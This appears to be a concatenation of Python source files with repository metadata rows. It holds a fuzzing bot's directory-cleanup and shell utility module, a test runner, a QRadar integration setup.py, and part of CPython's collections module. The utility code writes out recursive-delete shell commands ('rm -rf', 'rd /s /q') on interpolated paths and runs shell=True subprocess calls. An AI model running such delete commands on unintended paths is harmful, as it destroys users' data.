  """Clear all data directories on low disk space. This should ideally never
  happen, but when it does, we do this to keep the bot working in sane state."""
  available_space = get_free_disk_space()
  if available_space is None:
    # Free space could not be measured; err on the side of doing nothing.
    return

  if available_space < _low_disk_space_threshold():
    logs.log_warn(
        'Low disk space detected, clearing all data directories to free up space.'
    )
    clear_data_directories()
def clear_device_temp_directories():
  """Clear device specific temp directories."""
  # Only Android devices have on-device temp directories to clean.
  if environment.platform() != 'ANDROID':
    return
  from platforms import android
  android.device.clear_temp_directories()
def clear_fuzzers_directories():
  """Clears the fuzzers directory."""
  fuzzers_directory = environment.get_value('FUZZERS_DIR')
  remove_directory(fuzzers_directory, recreate=True)
def clear_temp_directory(clear_user_profile_directories=True):
  """Clear the temporary directories."""
  bot_tmpdir = environment.get_value('BOT_TMPDIR')
  remove_directory(bot_tmpdir, recreate=True)

  # The test temp directory may be distinct from the bot one; avoid clearing
  # the same directory twice.
  test_tmpdir = environment.get_value('TEST_TMPDIR')
  if test_tmpdir != bot_tmpdir:
    remove_directory(test_tmpdir, recreate=True)

  if environment.is_trusted_host():
    from bot.untrusted_runner import file_host
    file_host.clear_temp_directory()

  if clear_user_profile_directories:
    profile_root = environment.get_value('USER_PROFILE_ROOT_DIR')
    if profile_root:
      remove_directory(profile_root, recreate=True)
@environment.local_noop
def clear_system_temp_directory():
  """Clear system specific temp directory."""

  def _delete_object(path, delete_func):
    """Delete an object with its delete function, ignoring any error."""
    try:
      delete_func(path)
    except:
      pass

  if environment.get_value('SKIP_SYSTEM_TEMP_CLEANUP'):
    # This provides a way to avoid clearing system temporary directory when it
    # can interfere with other processes on the system.
    return
  # Cache system temp directory to avoid iterating through the system dir list
  # on every gettempdir call. Also, it helps to avoid a case where temp dir
  # fills up the disk and gets ignored by gettempdir.
  global _system_temp_dir
  if not _system_temp_dir:
    _system_temp_dir = tempfile.gettempdir()
  # Use a custom cleanup rather than using |remove_directory| since it
  # recreates the directory and can mess up permissions and symlinks.
  # Bottom-up traversal (topdown=False) empties subdirectories before their
  # parents, so the rmdir calls below can succeed.
  for root, dirs, files in walk(_system_temp_dir, topdown=False):
    for name in files:
      _delete_object(os.path.join(root, name), os.remove)
    for name in dirs:
      _delete_object(os.path.join(root, name), os.rmdir)
  logs.log('Cleared system temp directory: %s' % _system_temp_dir)
def clear_testcase_directories():
  """Clears the testcase directories."""
  remove_directory(environment.get_value('FUZZ_INPUTS'), recreate=True)
  remove_directory(environment.get_value('FUZZ_INPUTS_DISK'), recreate=True)
  # Some platforms keep additional testcase copies on the device/instance.
  if environment.platform() == 'ANDROID':
    from platforms import android
    android.device.clear_testcase_directory()
  if environment.platform() == 'FUCHSIA':
    from platforms import fuchsia
    fuchsia.device.clear_testcase_directory()
  # On a trusted host, also clear the matching directories on the untrusted
  # worker.
  if environment.is_trusted_host():
    from bot.untrusted_runner import file_host
    file_host.clear_testcase_directories()
def close_open_file_handles_if_needed(path):
  """Try to close all open file handle for a specific path."""
  if environment.platform() != 'WINDOWS':
    # Handle closing is only applicable on Windows platform.
    return
  resources_directory = environment.get_platform_resources_directory()
  handle_executable_path = os.path.join(resources_directory, 'handle.exe')
  # List all open handles under |path| using the bundled handle.exe tool
  # (-accepteula suppresses its interactive license prompt).
  handle_output = execute_command(
      '%s -accepteula "%s"' % (handle_executable_path, path))
  for line in handle_output.splitlines():
    match = HANDLE_OUTPUT_FILE_TYPE_REGEX.match(line)
    if not match:
      continue
    # Regex groups: (1) owning process id, (2) handle id, (3) file path.
    process_id = match.group(1).decode('utf-8')
    file_handle_id = match.group(2).decode('utf-8')
    file_path = match.group(3).decode('utf-8')
    logs.log(
        'Closing file handle id %s for path %s.' % (file_handle_id, file_path))
    # Force-close the handle (-c) in the owning process (-p), confirming the
    # prompt automatically (-y).
    execute_command('%s -accepteula -c %s -p %s -y' %
                    (handle_executable_path, file_handle_id, process_id))
def create_directory(directory, create_intermediates=False, recreate=False):
  """Creates |directory|. Create intermediate directories if
  |create_intermediates|. Ignore if it already exists and |recreate| is
  False. Returns True on success, False otherwise."""
  if os.path.exists(directory):
    if not recreate:
      return True
    remove_directory(directory)

  make_directory = os.makedirs if create_intermediates else os.mkdir
  try:
    make_directory(directory)
  except:
    logs.log_error('Unable to create directory %s.' % directory)
    return False

  return True
def execute_command(shell_command):
  """Run a command, returning its output (empty string on failure)."""
  try:
    process_handle = subprocess.Popen(
        shell_command,
        shell=True,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    stdout_data, _ = process_handle.communicate()
  except:
    logs.log_error('Error while executing command %s.' % shell_command)
    return ''

  return stdout_data
def get_command_and_arguments(command_line):
  """Return a (command, None) pair for |command_line|: the unsplit string on
  Windows, or a POSIX shlex-split argument list elsewhere. The second tuple
  element is always None."""
  if environment.platform() == 'WINDOWS':
    command = command_line
  else:
    command = shlex.split(command_line, posix=True)
  return command, None
def get_command_line_from_argument_list(argument_list):
  """Convert a list of arguments to a string."""
  command_line = subprocess.list2cmdline(argument_list)
  return command_line
def get_directory_file_count(directory_path):
  """Returns number of files within a directory (recursively)."""
  total = 0
  for root, _, filenames in walk(directory_path):
    # Only count entries that are regular files (skips dangling symlinks).
    total += sum(
        1 for filename in filenames
        if os.path.isfile(os.path.join(root, filename)))
  return total
def get_directory_size(directory_path):
  """Returns size of a directory (in bytes)."""
  total_bytes = 0
  for root, _, filenames in walk(directory_path):
    total_bytes += sum(
        os.path.getsize(os.path.join(root, filename))
        for filename in filenames)
  return total_bytes
def get_files_list(directory_path):
  """Returns a list of files in a directory (recursively)."""
  paths = []
  for root, _, filenames in walk(directory_path):
    # Keep regular files only, in traversal order.
    paths.extend(
        os.path.join(root, filename)
        for filename in filenames
        if os.path.isfile(os.path.join(root, filename)))
  return paths
def get_free_disk_space(path='/'):
  """Return free disk space in bytes for |path|, or None if it cannot be
  determined (the path does not exist, or psutil is unavailable)."""
  if not os.path.exists(path):
    return None

  # psutil is imported at module level inside a try/except and set to None
  # when unavailable; guard here instead of raising AttributeError.
  if psutil is None:
    return None

  return psutil.disk_usage(path).free
def get_interpreter(file_to_execute, is_blackbox_fuzzer=False):
  """Gives the interpreter needed to execute |file_to_execute|, or None if
  the extension is not recognized."""
  extension_to_interpreter = {
      '.bash': 'bash',
      '.class': 'java',
      '.js': 'node',
      '.pl': 'perl',
      '.py': sys.executable,
      '.pyc': sys.executable,
      '.sh': 'sh',
  }
  extension = os.path.splitext(file_to_execute)[1]
  interpreter = extension_to_interpreter.get(extension)
  if interpreter is None:
    return None

  # TODO(mbarbella): Remove this when fuzzers have been migrated to Python 3.
  if (is_blackbox_fuzzer and interpreter == sys.executable and
      environment.get_value('USE_PYTHON2_FOR_BLACKBOX_FUZZERS') and
      sys.version_info.major == 3):
    return 'python2'

  return interpreter
def get_execute_command(file_to_execute, is_blackbox_fuzzer=False):
  """Return command to execute |file_to_execute|."""
  interpreter = get_interpreter(
      file_to_execute, is_blackbox_fuzzer=is_blackbox_fuzzer)

  # Hack for Java scripts.
  target = file_to_execute.replace('.class', '')

  if not interpreter:
    # Executables that don't need an interpreter run directly.
    return target
  return '%s %s' % (interpreter, target)
def move(src, dst):
  """Wrapper around shutil.move(src, dst). If shutil.move throws an shutil.Error
  the exception is caught, an error is logged, and False is returned."""
  try:
    shutil.move(src, dst)
  except shutil.Error:
    logs.log_error('Failed to move %s to %s' % (src, dst))
    return False
  return True
def remove_empty_files(root_path):
  """Removes empty files in a path recursively"""
  for directory, _, filenames in walk(root_path):
    for filename in filenames:
      path = os.path.join(directory, filename)
      # Keep any file that has content; only zero-byte files are removed.
      if os.path.getsize(path) > 0:
        continue
      try:
        os.remove(path)
      except:
        logs.log_error('Unable to remove the empty file: %s (%s).' %
                       (path, sys.exc_info()[0]))
def remove_empty_directories(path):
  """Removes empty folder in a path recursively."""
  if not os.path.isdir(path):
    return

  # Recurse into children first so emptied subtrees can be pruned.
  for entry in os.listdir(path):
    child = os.path.join(path, entry)
    if os.path.isdir(child):
      remove_empty_directories(child)

  # Re-list after recursion; only delete |path| itself if now empty.
  if os.listdir(path):
    return
  try:
    os.rmdir(path)
  except:
    logs.log_error('Unable to remove empty folder %s.' % path)
def remove_file(file_path):
  """Removes a file, ignoring any error if it occurs."""
  try:
    if not os.path.exists(file_path):
      return
    os.remove(file_path)
  except:
    pass
def remove_directory(directory, recreate=False, ignore_errors=False):
  """Removes a directory tree.

  Tries OS-native delete commands first, then falls back to shutil.rmtree
  with an error handler that clears the read-only bit. Optionally recreates
  the directory afterwards. Returns True on success, False otherwise."""
  # Log errors as warnings if |ignore_errors| is set.
  log_error_func = logs.log_warn if ignore_errors else logs.log_error

  def clear_read_only(func, path, _):
    """Clear the read-only bit and reattempt the removal again.
    This is needed on Windows."""
    try:
      os.chmod(path, 0o750)
    except:
      # If this is tmpfs, we will probably fail.
      pass
    try:
      func(path)
    except:
      # Log errors for all cases except device or resource busy errors, as such
      # errors are expected in cases when mounts are used.
      error_message = str(sys.exc_info()[1])
      if 'Device or resource busy' not in error_message:
        logs.log_warn(
            'Failed to remove directory %s failed because %s with %s failed. %s'
            % (directory, func, path, error_message))

  # Try the os-specific deletion commands first. This helps to overcome issues
  # with unicode filename handling.
  if os.path.exists(directory):
    if environment.platform() == 'WINDOWS':
      os.system('rd /s /q "%s" > nul 2>&1' % directory)
    else:
      os.system('rm -rf "%s" > /dev/null 2>&1' % directory)
  if os.path.exists(directory):
    # If the directory still exists after using native OS delete commands, then
    # try closing open file handles and then try removing it with read only
    # bit removed (Windows only).
    close_open_file_handles_if_needed(directory)
    shutil.rmtree(directory, onerror=clear_read_only)
  if os.path.exists(directory):
    # 1. If directory is a mount point, then directory itself won't be
    #    removed. So, check the list of files inside it.
    # 2. If directory is a regular directory, then it should have not
    #    existed.
    if not os.path.ismount(directory) or os.listdir(directory):
      # Directory could not be cleared. Bail out.
      log_error_func('Failed to clear directory %s.' % directory)
      return False
    return True
  if not recreate:
    return True
  try:
    os.makedirs(directory)
  except:
    log_error_func('Unable to re-create directory %s.' % directory)
    return False
  return True
def walk(directory, **kwargs):
  """Wrapper around os.walk to resolve compatibility issues."""
  walker = os.walk(directory, **kwargs)
  return walker
# Copy of shutil.which from Python 3.3 (unavailable in Python 2.7).
# pylint: disable=bad-inline-option,g-inconsistent-quotes,redefined-builtin
# yapf: disable
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
  """Given a command, mode, and a PATH string, return the path which
  conforms to the given mode on the PATH, or None if there is no such
  file.
  `mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
  of os.environ.get("PATH"), or can be overridden with a custom search
  path.
  Note: This function was backported from the Python 3 source code.
  """

  def _is_candidate(candidate, candidate_mode):
    # A match must exist, satisfy the access mode, and not be a directory
    # (on Windows, directories pass the os.access check).
    return (os.path.exists(candidate) and os.access(candidate, candidate_mode)
            and not os.path.isdir(candidate))

  # A command containing a directory component is checked directly instead
  # of being searched on PATH. This covers relative invocations, e.g.
  # ./script.
  if os.path.dirname(cmd):
    return cmd if _is_candidate(cmd, mode) else None

  if path is None:
    path = os.environ.get("PATH", os.defpath)
    if not path:
      return None
  search_dirs = path.split(os.pathsep)

  if sys.platform == "win32":
    # The current directory takes precedence on Windows.
    if os.curdir not in search_dirs:
      search_dirs.insert(0, os.curdir)
    # PATHEXT lists the executable suffixes to try. If |cmd| already ends
    # with one of them (e.g. "python.exe"), only test |cmd| itself.
    pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
    lowered_cmd = cmd.lower()
    if any(lowered_cmd.endswith(ext.lower()) for ext in pathext):
      candidates = [cmd]
    else:
      candidates = [cmd + ext for ext in pathext]
  else:
    # Other platforms have no notion of executable suffixes; test as-is.
    candidates = [cmd]

  checked_dirs = set()
  for directory in search_dirs:
    normalized = os.path.normcase(directory)
    if normalized in checked_dirs:
      continue
    checked_dirs.add(normalized)
    for candidate in candidates:
      full_path = os.path.join(directory, candidate)
      if _is_candidate(full_path, mode):
        return full_path
  return None
# pylint: enable=bad-inline-option,g-inconsistent-quotes,redefined-builtin
# yapf: enable
| 30.860034 | 80 | 0.714372 |
ace8da8ee7526a82f251ef81ddefde497d5b3fef | 3,204 | py | Python | tests/args-test.py | mbits-libs/libargs | 72f5f2b87ae39f26638a585fa4ad0b96b4152ae6 | [
"MIT"
] | null | null | null | tests/args-test.py | mbits-libs/libargs | 72f5f2b87ae39f26638a585fa4ad0b96b4152ae6 | [
"MIT"
] | 2 | 2020-09-25T10:07:38.000Z | 2020-10-11T16:01:17.000Z | tests/args-test.py | mbits-libs/libargs | 72f5f2b87ae39f26638a585fa4ad0b96b4152ae6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from __future__ import print_function
import os
import sys
import subprocess
if sys.stdout.isatty():
COLORS = dict(
list(zip([
'grey',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'white',
],
list(range(30, 38))
))
)
COLORS['grey'] += 60
RESET = '\033[0m'
def colored(text, color=None):
fmt_str = '\033[%dm%s'
if color is not None:
text = fmt_str % (COLORS[color], text)
text += RESET
return text
else:
def colored(text, color=None):
return text
exe = sys.argv[1]
print(colored(exe, 'grey'))
exe = os.path.abspath(exe)
os.chdir(os.path.dirname(__file__))
def mktest(result, title, output):
    """Build a (result, title, output) test record, coercing result to int."""
    return int(result), title, output
def tests():
    """Run the test binary with no arguments to obtain the test manifest.

    The binary prints one 'result:title:output' line per test; each line is
    parsed into a (result, title, output) tuple via mktest(). Exits the
    script with the binary's return code if listing fails.
    """
    p = subprocess.Popen([exe], stdout=subprocess.PIPE)
    out, _ = p.communicate()
    if p.returncode:
        sys.exit(p.returncode)
    out = out.decode('utf-8').replace('\r\n', '\n')
    return [mktest(*line.split(':', 2)) for line in out.split('\n') if line]
def simplify(outdata):
    """Decode process output and escape newlines/tabs for one-line display."""
    text = outdata.decode('UTF-8')
    for raw, escaped in (('\r\n', '\\n'), ('\n', '\\n'), ('\t', '\\t')):
        text = text.replace(raw, escaped)
    return text
tests_failed = 0
test_id = 0
tests = tests()
def print_result(test_type, val_exp, val_act, expected, actual, returncode=None, err=None, out=None):
    """Compare |val_exp| against |val_act|; return True on match. On mismatch,
    bump the module-level failure counter and print a gtest-style diagnostic
    using the display values |expected|/|actual|.

    Note: returncode/err/out are accepted but not used in this function.
    """
    global tests_failed
    if val_exp == val_act:
        return True
    tests_failed += 1
    print('''Expected equality of these values:
  expected {type}
    Which is: {expected}
  actual {type}
    Which is: {actual}'''.format(type=test_type, expected=expected, actual=actual))
    return False
def print_result_simple(test_type, expected, actual):
    """Variant of print_result for when the compared values are also the
    display values."""
    return print_result(test_type, expected, actual, expected, actual)
index = -1
for result, title, output in tests:
index += 1
print(colored("[ RUN ]", "green"), colored(title, "grey"))
sys.stdout.flush()
p = subprocess.Popen([exe, "%s" % test_id],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
test_id += 1
out, err = p.communicate()
failed = p.returncode != 0
should_fail = result != 0
if not print_result('result', should_fail, failed, result, p.returncode, err, out):
if p.returncode:
print('stderr:')
print(err.decode('UTF-8'))
print()
else:
print('stdout:')
print(out.decode('UTF-8'))
print()
print(colored("[ FAILED ]", "red"), colored(title, "grey"))
elif output != '' and result == 0 and not print_result_simple('stdout', output, simplify(out)):
print(colored("[ FAILED ]", "red"), colored(title, "grey"))
elif output != '' and result != 0 and not print_result_simple('stderr', output, simplify(err)):
print(colored("[ FAILED ]", "red"), colored(
"{} [{}]".format(title, index), "grey"))
else:
print(colored("[ OK ]", "green"), colored(title, "grey"))
print(
"Result: {failed}/{total} failed".format(failed=tests_failed, total=len(tests)))
sys.exit(tests_failed)
| 26.04878 | 101 | 0.575843 |
ace8daabbbfae1b6ac6b03f1f72097f4c62cbfcd | 1,949 | py | Python | fn_qradar_integration/setup.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | fn_qradar_integration/setup.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | fn_qradar_integration/setup.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
# Packaging metadata for the fn_qradar_integration Resilient Circuits app.
setup(
    name='fn_qradar_integration',
    version='2.0.7',
    license='MIT License',
    author='IBM Resilient',
    author_email='support@resilientsystems.com',
    url='https://github.com/ibmresilient/resilient-community-apps/tree/master/fn_qradar_integration',
    description="Resilient Circuits Components for 'fn_qradar_integration'",
    long_description="fn_qradar_integration supports performing ariel search to retrieve data from QRadar. It also provide functions to find/add/delete reference set items.",
    install_requires=[
        'resilient_circuits>=30.0.0',
        'resilient_lib'
    ],
    packages=find_packages(),
    include_package_data=True,
    platforms='any',
    classifiers=[
        'Programming Language :: Python',
    ],
    # Entry points register each function component and utility hook with the
    # resilient-circuits framework at runtime.
    entry_points={
        "resilient.circuits.components": [
            "QradarFindReferenceSetsFunctionComponent = fn_qradar_integration.components.qradar_find_reference_sets:FunctionComponent",
            "QradarDeleteReferenceSetItemFunctionComponent = fn_qradar_integration.components.qradar_delete_reference_set_item:FunctionComponent",
            "QradarAddReferenceSetItemFunctionComponent = fn_qradar_integration.components.qradar_add_reference_set_item:FunctionComponent",
            "QradarFindReferenceSetItemFunctionComponent = fn_qradar_integration.components.qradar_find_reference_set_item:FunctionComponent",
            "QradarSearchFunctionComponent = fn_qradar_integration.components.qradar_search:FunctionComponent"
        ],
        "resilient.circuits.configsection": ["gen_config = fn_qradar_integration.util.config:config_section_data"],
        "resilient.circuits.customize": ["customize = fn_qradar_integration.util.customize:customization_data"],
        "resilient.circuits.selftest": ["selftest = fn_qradar_integration.util.selftest:selftest_function"]
    }
)
| 51.289474 | 174 | 0.757311 |
ace8db113329c8b809c24ce82803ae534ebc97c4 | 52,230 | py | Python | Lib/collections/__init__.py | tai271828/RustPython | 9fb70707c4803f9f6d79dd4c8077bd16f0a9be45 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2021-09-03T16:15:06.000Z | 2021-09-03T16:19:28.000Z | Lib/collections/__init__.py | tai271828/RustPython | 9fb70707c4803f9f6d79dd4c8077bd16f0a9be45 | [
"CC-BY-4.0",
"MIT"
] | 6 | 2021-10-01T13:51:43.000Z | 2021-11-17T13:27:14.000Z | Lib/collections/__init__.py | tai271828/RustPython | 9fb70707c4803f9f6d79dd4c8077bd16f0a9be45 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-08-04T12:13:42.000Z | 2020-08-04T12:13:42.000Z | '''This module implements specialized container datatypes providing
alternatives to Python's general purpose built-in containers, dict,
list, set, and tuple.
* namedtuple factory function for creating tuple subclasses with named fields
* deque list-like container with fast appends and pops on either end
* ChainMap dict-like class for creating a single view of multiple mappings
* Counter dict subclass for counting hashable objects
* OrderedDict dict subclass that remembers the order entries were added
* defaultdict dict subclass that calls a factory function to supply missing values
* UserDict wrapper around dictionary objects for easier dict subclassing
* UserList wrapper around list objects for easier list subclassing
* UserString wrapper around string objects for easier string subclassing
'''
__all__ = [
'ChainMap',
'Counter',
'OrderedDict',
'UserDict',
'UserList',
'UserString',
'defaultdict',
'deque',
'namedtuple',
]
import _collections_abc
import heapq as _heapq
import sys as _sys
from itertools import chain as _chain
from itertools import repeat as _repeat
from itertools import starmap as _starmap
from keyword import iskeyword as _iskeyword
from operator import eq as _eq
from operator import itemgetter as _itemgetter
from reprlib import recursive_repr as _recursive_repr
from _weakref import proxy as _proxy
try:
from _collections import deque
except ImportError:
pass
else:
_collections_abc.MutableSequence.register(deque)
try:
from _collections import defaultdict
except ImportError:
# FIXME: try to implement defaultdict in collections.rs rather than in Python
# I (coolreader18) couldn't figure out some class stuff with __new__ and
# __init__ and __missing__ and subclassing built-in types from Rust, so I went
# with this instead.
from ._defaultdict import defaultdict
def __getattr__(name):
    # Module-level __getattr__ (PEP 562): called only when |name| is not a
    # regular attribute of this module.
    # For backwards compatibility, continue to make the collections ABCs
    # through Python 3.6 available through the collections module.
    # Note, no new collections ABCs were added in Python 3.7
    if name in _collections_abc.__all__:
        obj = getattr(_collections_abc, name)
        import warnings
        warnings.warn("Using or importing the ABCs from 'collections' instead "
                      "of from 'collections.abc' is deprecated since Python 3.3, "
                      "and in 3.10 it will stop working",
                      DeprecationWarning, stacklevel=2)
        # Cache in the module namespace so subsequent lookups bypass
        # __getattr__ (the warning fires at most once per name).
        globals()[name] = obj
        return obj
    raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
################################################################################
### OrderedDict
################################################################################
class _OrderedDictKeysView(_collections_abc.KeysView):
    """Keys view over an OrderedDict that supports reversed iteration."""

    def __reversed__(self):
        for key in reversed(self._mapping):
            yield key
class _OrderedDictItemsView(_collections_abc.ItemsView):
    """Items view over an OrderedDict that supports reversed iteration."""

    def __reversed__(self):
        mapping = self._mapping
        yield from ((key, mapping[key]) for key in reversed(mapping))
class _OrderedDictValuesView(_collections_abc.ValuesView):
    """Values view over an OrderedDict that supports reversed iteration."""

    def __reversed__(self):
        mapping = self._mapping
        yield from (mapping[key] for key in reversed(mapping))
class _Link(object):
    # Node of OrderedDict's internal circular doubly linked list. The
    # '__weakref__' slot allows links to be wrapped in weakref proxies,
    # which OrderedDict uses for 'prev' references to avoid reference
    # cycles (see the comments in OrderedDict below).
    __slots__ = 'prev', 'next', 'key', '__weakref__'
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as regular dictionaries.
# The internal self.__map dict maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# The sentinel is in self.__hardroot with a weakref proxy in self.__root.
# The prev links are weakref proxies (to prevent circular references).
# Individual links are kept alive by the hard reference in self.__map.
# Those hard references disappear when a key is deleted from an OrderedDict.
def __init__(*args, **kwds):
'''Initialize an ordered dictionary. The signature is the same as
regular dictionaries. Keyword argument order is preserved.
'''
if not args:
raise TypeError("descriptor '__init__' of 'OrderedDict' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__hardroot = _Link()
self.__root = root = _proxy(self.__hardroot)
root.prev = root.next = root
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value,
dict_setitem=dict.__setitem__, proxy=_proxy, Link=_Link):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link at the end of the linked list,
# and the inherited dictionary is updated with the new key/value pair.
if key not in self:
self.__map[key] = link = Link()
root = self.__root
last = root.prev
link.prev, link.next, link.key = last, root, key
last.next = link
root.prev = proxy(link)
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which gets
# removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link = self.__map.pop(key)
link_prev = link.prev
link_next = link.next
link_prev.next = link_next
link_next.prev = link_prev
link.prev = None
link.next = None
def __iter__(self):
'od.__iter__() <==> iter(od)'
# Traverse the linked list in order.
root = self.__root
curr = root.next
while curr is not root:
yield curr.key
curr = curr.next
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
# Traverse the linked list in reverse order.
root = self.__root
curr = root.prev
while curr is not root:
yield curr.key
curr = curr.prev
def clear(self):
'od.clear() -> None. Remove all items from od.'
root = self.__root
root.prev = root.next = root
self.__map.clear()
dict.clear(self)
def popitem(self, last=True):
'''Remove and return a (key, value) pair from the dictionary.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root.prev
link_prev = link.prev
link_prev.next = root
root.prev = link_prev
else:
link = root.next
link_next = link.next
root.next = link_next
link_next.prev = root
key = link.key
del self.__map[key]
value = dict.pop(self, key)
return key, value
def move_to_end(self, key, last=True):
'''Move an existing element to the end (or beginning if last is false).
Raise KeyError if the element does not exist.
'''
link = self.__map[key]
link_prev = link.prev
link_next = link.next
soft_link = link_next.prev
link_prev.next = link_next
link_next.prev = link_prev
root = self.__root
if last:
last = root.prev
link.prev = last
link.next = root
root.prev = soft_link
last.next = link
else:
first = root.next
link.prev = root
link.next = first
first.prev = soft_link
root.next = link
def __sizeof__(self):
sizeof = _sys.getsizeof
n = len(self) + 1 # number of links including root
size = sizeof(self.__dict__) # instance dictionary
size += sizeof(self.__map) * 2 # internal dict and inherited dict
size += sizeof(self.__hardroot) * n # link objects
size += sizeof(self.__root) * n # proxy objects
return size
update = __update = _collections_abc.MutableMapping.update
def keys(self):
"D.keys() -> a set-like object providing a view on D's keys"
return _OrderedDictKeysView(self)
def items(self):
"D.items() -> a set-like object providing a view on D's items"
return _OrderedDictItemsView(self)
def values(self):
"D.values() -> an object providing a view on D's values"
return _OrderedDictValuesView(self)
__ne__ = _collections_abc.MutableMapping.__ne__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding
value. If key is not found, d is returned if given, otherwise KeyError
is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'''Insert key with a value of default if key is not in the dictionary.
Return the value for key if key is in the dictionary, else default.
'''
if key in self:
return self[key]
self[key] = default
return default
@_recursive_repr()
def __repr__(self):
'od.__repr__() <==> repr(od)'
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self.items()))
def __reduce__(self):
'Return state information for pickling'
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
return self.__class__, (), inst_dict or None, None, iter(self.items())
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''Create a new ordered dictionary with keys from iterable and values set to value.
'''
self = cls()
for key in iterable:
self[key] = value
return self
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return dict.__eq__(self, other) and all(map(_eq, self, other))
return dict.__eq__(self, other)
def __ior__(self, other):
self.update(other)
return self
def __or__(self, other):
if not isinstance(other, dict):
return NotImplemented
new = self.__class__(self)
new.update(other)
return new
def __ror__(self, other):
if not isinstance(other, dict):
return NotImplemented
new = self.__class__(other)
new.update(self)
return new
try:
from _collections import OrderedDict
except ImportError:
# Leave the pure Python version in place.
pass
################################################################################
### namedtuple
################################################################################
try:
from _collections import _tuplegetter
except ImportError:
_tuplegetter = lambda index, doc: property(_itemgetter(index), doc=doc)
def namedtuple(typename, field_names, *, rename=False, defaults=None, module=None):
    """Returns a new subclass of tuple with named fields.

    >>> Point = namedtuple('Point', ['x', 'y'])
    >>> p = Point(11, y=22)     # instantiate with positional args or keywords
    >>> p[0] + p[1]             # indexable like a plain tuple
    33
    >>> p.x + p.y               # fields also accessible by name
    33
    >>> p._asdict()['x']        # convert to a dictionary
    11
    >>> p._replace(x=100)       # _replace() targets named fields
    Point(x=100, y=22)
    """
    # --- Validate/normalize the type and field names ---------------------
    # With rename=True, invalid or duplicate names are silently replaced
    # by positional names of the form _0, _1, ...
    if isinstance(field_names, str):
        field_names = field_names.replace(',', ' ').split()
    field_names = list(map(str, field_names))
    typename = _sys.intern(str(typename))

    if rename:
        seen = set()
        for index, name in enumerate(field_names):
            if (not name.isidentifier()
                    or _iskeyword(name)
                    or name.startswith('_')
                    or name in seen):
                field_names[index] = f'_{index}'
            seen.add(name)

    for name in [typename] + field_names:
        if type(name) is not str:
            raise TypeError('Type names and field names must be strings')
        if not name.isidentifier():
            raise ValueError('Type names and field names must be valid '
                             f'identifiers: {name!r}')
        if _iskeyword(name):
            raise ValueError('Type names and field names cannot be a '
                             f'keyword: {name!r}')

    seen = set()
    for name in field_names:
        if name.startswith('_') and not rename:
            raise ValueError('Field names cannot start with an underscore: '
                             f'{name!r}')
        if name in seen:
            raise ValueError(f'Encountered duplicate field name: {name!r}')
        seen.add(name)

    field_defaults = {}
    if defaults is not None:
        defaults = tuple(defaults)
        if len(defaults) > len(field_names):
            raise TypeError('Got more default values than field names')
        # Map the rightmost fields onto the supplied defaults.
        field_defaults = dict(reversed(list(zip(reversed(field_names),
                                                reversed(defaults)))))

    # --- Variables used in the generated methods and docstrings ----------
    field_names = tuple(map(_sys.intern, field_names))
    num_fields = len(field_names)
    arg_list = ', '.join(field_names)
    if num_fields == 1:
        arg_list += ','          # single-element tuple needs trailing comma
    repr_fmt = '(' + ', '.join(f'{name}=%r' for name in field_names) + ')'
    tuple_new = tuple.__new__
    _dict, _tuple, _len, _map, _zip = dict, tuple, len, map, zip

    # --- Create the methods to be added to the class namespace -----------
    # __new__ is built with eval() so its signature shows the field names.
    namespace = {
        '_tuple_new': tuple_new,
        '__builtins__': {},
        '__name__': f'namedtuple_{typename}',
    }
    code = f'lambda _cls, {arg_list}: _tuple_new(_cls, ({arg_list}))'
    __new__ = eval(code, namespace)
    __new__.__name__ = '__new__'
    __new__.__doc__ = f'Create new instance of {typename}({arg_list})'
    if defaults is not None:
        __new__.__defaults__ = defaults

    @classmethod
    def _make(cls, iterable):
        result = tuple_new(cls, iterable)
        if _len(result) != num_fields:
            raise TypeError(f'Expected {num_fields} arguments, got {len(result)}')
        return result

    _make.__func__.__doc__ = (f'Make a new {typename} object from a sequence '
                              'or iterable')

    def _replace(_self, /, **kwds):
        result = _self._make(_map(kwds.pop, field_names, _self))
        if kwds:
